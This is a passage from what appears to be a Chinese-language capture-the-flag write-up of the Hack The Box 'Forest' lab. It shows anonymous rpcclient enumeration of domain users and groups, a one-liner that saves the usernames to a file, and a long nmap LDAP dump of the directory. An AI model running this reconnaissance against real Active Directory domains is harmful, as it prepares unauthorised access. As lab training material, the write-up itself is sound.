name:[Builtin] idx:[0x0]

enumdomusers

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> 

querydominfo

rpcclient $> querydominfo
Domain:		HTB
Server:		
Comment:	
Total Users:	105
Total Groups:	0
Total Aliases:	0
Sequence No:	1
Force Logoff:	-1
Domain Server State:	0x1
Server Role:	ROLE_DOMAIN_PDC
Unknown 3:	0x1
rpcclient $> 

enumdomgroups

rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
rpcclient $> 

12、这里也可以使用正则的方法把系统上的账号保存到本地中

┌─[us-vip-22]─[10.10.14.5]─[htb-shiyan@htb-b3h4uwg3h4]─[~/Desktop]
└──╼ [★]$ rpcclient -U "" -N 10.10.10.161 -c "enumdomusers" | grep -oP "\[.*?\]" | grep -v 0x | tr -d "[]" > users
┌─[us-vip-22]─[10.10.14.5]─[htb-shiyan@htb-b3h4uwg3h4]─[~/Desktop]
└──╼ [★]$ cat users 
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi

13、由于前面开放了389端口的ldap服务，我们也可以使用nmap的ldap-search脚本来获取到一些信息

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -p 389 --script ldap-search 10.10.10.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-19 21:42 CST
Nmap scan report for htb.local (10.10.10.161)
Host is up (0.29s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search: 
|   Context: DC=htb,DC=local
|     dn: DC=htb,DC=local
|         objectClass: top
|         objectClass: domain
|         objectClass: domainDNS
|         distinguishedName: DC=htb,DC=local
|         instanceType: 5
|         whenCreated: 2019/09/18 17:45:49 UTC
|         whenChanged: 2023/12/19 13:36:41 UTC
|         subRefs: DC=ForestDnsZones,DC=htb,DC=local
|         subRefs: DC=DomainDnsZones,DC=htb,DC=local
|         subRefs: CN=Configuration,DC=htb,DC=local
|         uSNCreated: 4099
|         dSASignature: \x01\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\xA3k#YyAJ\xB9Y_\x82h\x9A\x08q
|         uSNChanged: 888873
|         name: htb
|         objectGUID: dff0c71a-49a9-264b-8c7b-52e3e2cb6eab
|         replUpToDateVector: \x02\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x80+\xBA\x07\xA0+|B\x8E\x91\xB7\x8C\xE2\xAFM\x9B
|         \x00\x00\x00\x00\x00\xD4\xBD>\x17\x03\x00\x00\x00i\xB5Y\x1F\xFA\x8B\xA9G\xB3\xB0R.\xA0\xD4b\xEC\x16P\x03\x00\x00\x00\x00\x00\x01\xD5\xAA\x13\x03\x00\x00\x00:\xA3k#YyAJ\xB9Y_\x82h\x9A\x08q\x05\xA0\x00\x00\x00\x00\x00\x00_!\x99\x13\x03\x00\x00\x00\xFD!?9\xEE\x966L\xB0C\xBC\x0Fp\x8Du\xBA\x19\x10\x04\x00\x00\x00\x00\x00n\xC9=\x17\x03\x00\x00\x00\x10<\x01A\xB4\x8C\x9DE\x88\xE2z\xBC\x05\x8E\xE3\xD7\x150\x03\x00\x00\x00\x00\x00\xD5\xD7\xA6\x13\x03\x00\x00\x00\xB50\xC6a\xA2A\xB0E\xB14A\x1A\xB5N1c\x08\xD0\x00\x00\x00\x00\x00\x00\x9F=\x99\x13\x03\x00\x00\x00N|cxf\x16\xECI\xAB\x9C\xCDQ\xEE`H\x81\x13p\x02\x00\x00\x00\x00\x00\xDDm\xA0\x13\x03\x00\x00\x001\xF4\xC6\x8BEpyC\xA6\x9B\x99\xF2\xB4\x8D&p\x0C\x10\x01\x00\x00\x00\x00\x00\x86\xC5\x99\x13\x03\x00\x00\x00\xB7\x02\xFE\x8F
|         \x00\x00\x00\x00\x00\x99\xC5>\x17\x03\x00\x00\x00\x12\xE3\xA9\xF1\xC0\xBA\xB7O\xAEj\x87\xBC\xDE:\xA7-\x07\xC0\x00\x00\x00\x00\x00\x00\xC37\x99\x13\x03\x00\x00\x00\x9E\xBD\x80\xF9D\x13\xFBE\xBA\xD8\x01
|         \xE0\x8E\x1B\x8F\x1C\xD0\x0C\x00\x00\x00\x00\x00\xB1\xAF>\x17\x03\x00\x00\x00
|         creationTime: 133474666010938552
|         forceLogoff: -9223372036854775808
|         lockoutDuration: -18000000000
|         lockOutObservationWindow: -18000000000
|         lockoutThreshold: 0
|         maxPwdAge: -9223372036854775808
|         minPwdAge: -864000000000
|         minPwdLength: 7
|         modifiedCountAtLastProm: 0
|         nextRid: 1000
|         pwdProperties: 0
|         pwdHistoryLength: 24
|         objectSid: 1-5-21-3072663084-364016917-1341370565
|         serverState: 1
|         uASCompat: 1
|         modifiedCount: 1
|         auditingPolicy: \x00\x01
|         nTMixedDomain: 0
|         rIDManagerReference: CN=RID Manager$,CN=System,DC=htb,DC=local
|         fSMORoleOwner: CN=NTDS Settings,CN=FOREST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=htb,DC=local
|         systemFlags: -1946157056
|         wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=htb,DC=local
|         wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Program Data,DC=htb,DC=local
|         wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=htb,DC=local
|         wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrincipals,DC=htb,DC=local
|         wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=htb,DC=local
|         wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=htb,DC=local
|         wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=htb,DC=local
|         wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=htb,DC=local
|         wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,DC=htb,DC=local
|         wellKnownObjects: B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=htb,DC=local
|         wellKnownObjects: B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=htb,DC=local
|         objectCategory: CN=Domain-DNS,CN=Schema,CN=Configuration,DC=htb,DC=local
|         isCriticalSystemObject: TRUE
|         gPLink: [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=htb,DC=local;0]
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         otherWellKnownObjects: B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=htb,DC=local
|         otherWellKnownObjects: B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Service Accounts,DC=htb,DC=local
|         masteredBy: CN=NTDS Settings,CN=FOREST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=htb,DC=local
|         ms-DS-MachineAccountQuota: 10
|         msDS-Behavior-Version: 7
|         msDS-PerUserTrustQuota: 1
|         msDS-AllUsersTrustQuota: 1000
|         msDS-PerUserTrustTombstonesQuota: 10
|         msDs-masteredBy: CN=NTDS Settings,CN=FOREST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=htb,DC=local
|         msDS-IsDomainFor: CN=NTDS Settings,CN=FOREST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=htb,DC=local
|         msDS-NcType: 0
|         msDS-ExpirePasswordsOnSmartCardOnlyAccounts: TRUE
|         dc: htb
|     dn: CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: container
|         cn: Users
|         description: Default container for upgraded user accounts
|         distinguishedName: CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/18 17:45:57 UTC
|         whenChanged: 2019/09/23 22:51:14 UTC
|         uSNCreated: 5888
|         uSNChanged: 94253
|         showInAdvancedViewOnly: FALSE
|         name: Users
|         objectGUID: 28cbed1a-9b7f-1e49-9fce-a053e95892cd
|         systemFlags: -1946157056
|         objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=htb,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|     dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: group
|         cn: Allowed RODC Password Replication Group
|         description: Members in this group can have their passwords replicated to all read-only domain controllers in the domain
|         distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/18 10:53:23 UTC
|         whenChanged: 2019/09/18 10:53:23 UTC
|         uSNCreated: 12402
|         uSNChanged: 12404
|         name: Allowed RODC Password Replication Group
|         objectGUID: 749868e0-3a64-c04d-9924-5bf97cfbd368
|         objectSid: 1-5-21-3072663084-364016917-1341370565-571
|         sAMAccountName: Allowed RODC Password Replication Group
|         sAMAccountType: 536870912
|         groupType: -2147483644
|         objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|     dn: CN=Denied RODC Password Replication Group,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: group
|         cn: Denied RODC Password Replication Group
|         description: Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
|         member: CN=Read-only Domain Controllers,CN=Users,DC=htb,DC=local
|         member: CN=Group Policy Creator Owners,CN=Users,DC=htb,DC=local
|         member: CN=Domain Admins,CN=Users,DC=htb,DC=local
|         member: CN=Cert Publishers,CN=Users,DC=htb,DC=local
|         member: CN=Enterprise Admins,CN=Users,DC=htb,DC=local
|         member: CN=Schema Admins,CN=Users,DC=htb,DC=local
|         member: CN=Domain Controllers,CN=Users,DC=htb,DC=local
|         member: CN=krbtgt,CN=Users,DC=htb,DC=local
|         distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/18 10:53:23 UTC
|         whenChanged: 2019/09/18 10:53:23 UTC
|         uSNCreated: 12405
|         uSNChanged: 12433
|         name: Denied RODC Password Replication Group
|         objectGUID: 85841ef1-9221-204d-889c-673355fe244f
|         objectSid: 1-5-21-3072663084-364016917-1341370565-572
|         sAMAccountName: Denied RODC Password Replication Group
|         sAMAccountType: 536870912
|         groupType: -2147483644
|         objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|     dn: CN=Read-only Domain Controllers,CN=Users,DC=htb,DC=local
|     dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: group
|         cn: Enterprise Read-only Domain Controllers
|         description: Members of this group are Read-Only Domain Controllers in the enterprise
|         distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/18 10:53:23 UTC
|         whenChanged: 2019/09/18 10:53:23 UTC
|         uSNCreated: 12429
|         uSNChanged: 12431
|         name: Enterprise Read-only Domain Controllers
|         objectGUID: f9d71231-d92-740-b238-8480a1a03d3
|         objectSid: 1-5-21-3072663084-364016917-1341370565-498
|         sAMAccountName: Enterprise Read-only Domain Controllers
|         sAMAccountType: 268435456
|         groupType: -2147483640
|         objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|     dn: CN=Cloneable Domain Controllers,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: group
|         cn: Cloneable Domain Controllers
|         description: Members of this group that are domain controllers may be cloned.
|         distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/18 10:53:23 UTC
|         whenChanged: 2019/09/18 10:53:23 UTC
|         uSNCreated: 12440
|         uSNChanged: 12442
|         name: Cloneable Domain Controllers
|         objectGUID: d8693b95-c468-ea44-8748-dc45c26dd433
|         objectSid: 1-5-21-3072663084-364016917-1341370565-522
|         sAMAccountName: Cloneable Domain Controllers
|         sAMAccountType: 268435456
|         groupType: -2147483646
|         objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|     dn: CN=Protected Users,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: group
|         cn: Protected Users
|         description: Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.
|         distinguishedName: CN=Protected Users,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/18 10:53:23 UTC
|         whenChanged: 2019/09/18 10:53:23 UTC
|         uSNCreated: 12445
|         uSNChanged: 12447
|         name: Protected Users
|         objectGUID: f49ff1f0-ac6e-b445-8b0-4557dad337dc
|         objectSid: 1-5-21-3072663084-364016917-1341370565-525
|         sAMAccountName: Protected Users
|         sAMAccountType: 268435456
|         groupType: -2147483646
|         objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|     dn: CN=Key Admins,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: group
|         cn: Key Admins
|         description: Members of this group can perform administrative actions on key objects within the domain.
|         distinguishedName: CN=Key Admins,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/18 10:53:23 UTC
|         whenChanged: 2019/09/18 10:53:23 UTC
|         uSNCreated: 12450
|         uSNChanged: 12452
|         name: Key Admins
|         objectGUID: d96a5abb-188-3a4f-9094-6c69574d82ad
|         objectSid: 1-5-21-3072663084-364016917-1341370565-526
|         sAMAccountName: Key Admins
|         sAMAccountType: 268435456
|         groupType: -2147483646
|         objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|     dn: CN=Enterprise Key Admins,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: group
|         cn: Enterprise Key Admins
|         description: Members of this group can perform administrative actions on key objects within the forest.
|         distinguishedName: CN=Enterprise Key Admins,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/18 10:53:23 UTC
|         whenChanged: 2019/09/18 10:53:23 UTC
|         uSNCreated: 12453
|         uSNChanged: 12455
|         name: Enterprise Key Admins
|         objectGUID: 8ca3f11-ac78-b745-a32f-8cfa23b7f093
|         objectSid: 1-5-21-3072663084-364016917-1341370565-527
|         sAMAccountName: Enterprise Key Admins
|         sAMAccountType: 268435456
|         groupType: -2147483640
|         objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
|         isCriticalSystemObject: TRUE
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|     dn: CN=DnsAdmins,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: group
|         cn: DnsAdmins
|         description: DNS Administrators Group
|         distinguishedName: CN=DnsAdmins,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/18 10:54:03 UTC
|         whenChanged: 2019/09/18 10:54:03 UTC
|         uSNCreated: 12483
|         uSNChanged: 12485
|         name: DnsAdmins
|         objectGUID: 64d78f1a-39a7-fe4f-ba23-eae7f846b8b
|         objectSid: 1-5-21-3072663084-364016917-1341370565-1101
|         sAMAccountName: DnsAdmins
|         sAMAccountType: 536870912
|         groupType: -2147483644
|         objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|     dn: CN=DnsUpdateProxy,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: group
|         cn: DnsUpdateProxy
|         description: DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).
|         distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/18 10:54:03 UTC
|         whenChanged: 2019/09/18 10:54:03 UTC
|         uSNCreated: 12488
|         uSNChanged: 12488
|         name: DnsUpdateProxy
|         objectGUID: c2c7c95-4bea-8a45-a494-93df6f83979a
|         objectSid: 1-5-21-3072663084-364016917-1341370565-1102
|         sAMAccountName: DnsUpdateProxy
|         sAMAccountType: 268435456
|         groupType: -2147483646
|         objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|     dn: CN=Exchange Online-ApplicationAccount,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: user
|         cn: Exchange Online-ApplicationAccount
|         distinguishedName: CN=Exchange Online-ApplicationAccount,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/19 11:11:26 UTC
|         whenChanged: 2019/09/19 11:11:26 UTC
|         uSNCreated: 23683
|         uSNChanged: 23684
|         garbageCollPeriod: 1209600
|         name: Exchange Online-ApplicationAccount
|         objectGUID: 2f9f1f5c-ec7d-214c-8ffa-4dc777e76c4a
|         userAccountControl: 546
|         badPwdCount: 0
|         codePage: 0
|         countryCode: 0
|         badPasswordTime: Never
|         lastLogoff: 0
|         lastLogon: Never
|         pwdLastSet: Never
|         primaryGroupID: 513
|         objectSid: 1-5-21-3072663084-364016917-1341370565-1123
|         accountExpires: 30828-09-13T17:57:29+00:00
|         logonCount: 0
|         sAMAccountName: $331000-VK4ADACQNUCA
|         sAMAccountType: 805306368
|         userPrincipalName: Exchange_Online-ApplicationAccount@htb.local
|         objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=htb,DC=local
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         msExchVersion: 1130555651391488
|         msExchProvisioningFlags: 0
|         msExchMailboxAuditEnable: FALSE
|         msExchUserBL: CN=MeetingGraphApplication-Exchange Online-ApplicationAccount,CN=Role Assignments,CN=RBAC,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchUserBL: CN=MailboxSearchApplication-Exchange Online-ApplicationAccount,CN=Role Assignments,CN=RBAC,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchUserBL: CN=TeamMailboxLifecycleApplication-Exchange Online-ApplicationAccou,CN=Role Assignments,CN=RBAC,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchUserBL: CN=Mailbox Search-Exchange Online-ApplicationAccount,CN=Role Assignments,CN=RBAC,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchUserBL: CN=LegalHoldApplication-Exchange Online-ApplicationAccount,CN=Role Assignments,CN=RBAC,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchUserBL: CN=ArchiveApplication-Exchange Online-ApplicationAccount,CN=Role Assignments,CN=RBAC,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchUserBL: CN=UserApplication-Exchange Online-ApplicationAccount,CN=Role Assignments,CN=RBAC,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchTransportRecipientSettingsFlags: 0
|         internetEncoding: 0
|         msExchModerationFlags: 6
|         msExchRecipientSoftDeletedStatus: 0
|         msExchUserAccountControl: 0
|         msExchUMEnabledFlags2: -1
|         msExchMailboxFolderSet: 0
|         msExchRecipientDisplayType: 12
|         msExchBypassAudit: FALSE
|         msExchMailboxAuditLogAgeLimit: 7776000
|         msExchMDBRulesQuota: 256
|         msExchRecipientTypeDetails: 33554432
|         msExchGroupSecurityFlags: 0
|         msExchAddressBookFlags: 1
|     dn: CN=SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1},CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: user
|         cn: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
|         sn: MSExchApproval 1f05a927-3be2-4fb9-aa03-b59fe3b56f4c
|         distinguishedName: CN=SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1},CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/19 11:11:27 UTC
|         whenChanged: 2019/09/19 11:47:15 UTC
|         displayName: Microsoft Exchange Approval Assistant
|         uSNCreated: 23777
|         uSNChanged: 24819
|         proxyAddresses: SMTP:SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local
|         name: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
|         objectGUID: 7a1aa2b-484c-474a-b291-2026675efed
|         userAccountControl: 514
|         badPwdCount: 0
|         codePage: 0
|         countryCode: 0
|         badPasswordTime: Never
|         lastLogoff: 0
|         lastLogon: Never
|         pwdLastSet: Never
|         primaryGroupID: 513
|         objectSid: 1-5-21-3072663084-364016917-1341370565-1124
|         accountExpires: 30828-09-13T17:57:29+00:00
|         logonCount: 0
|         sAMAccountName: SM_2c8eef0a09b545acb
|         sAMAccountType: 805306368
|         legacyExchangeDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=4d0d9ee8e5aa4097bfd477c844b94abf-Syste
|         userPrincipalName: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local
|         objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=htb,DC=local
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         mail: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local
|         msExchVersion: 1126140425011200
|         msExchProvisioningFlags: 0
|         homeMDB: CN=Mailbox Database 1118319013,CN=Databases,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchApprovalApplicationLink: CN=ModeratedRecipients,CN=Approval Applications,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchApprovalApplicationLink: CN=AutoGroup,CN=Approval Applications,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchMailboxSecurityDescriptor: \x01\x00\x04\x80\x14\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00,\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x04\x00\x1C\x00\x01\x00\x00\x00\x00\x02\x14\x00\x05\x00\x02\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchRequireAuthToSendTo: TRUE
|         msExchArchiveQuota: 104857600
|         msExchMailboxAuditEnable: FALSE
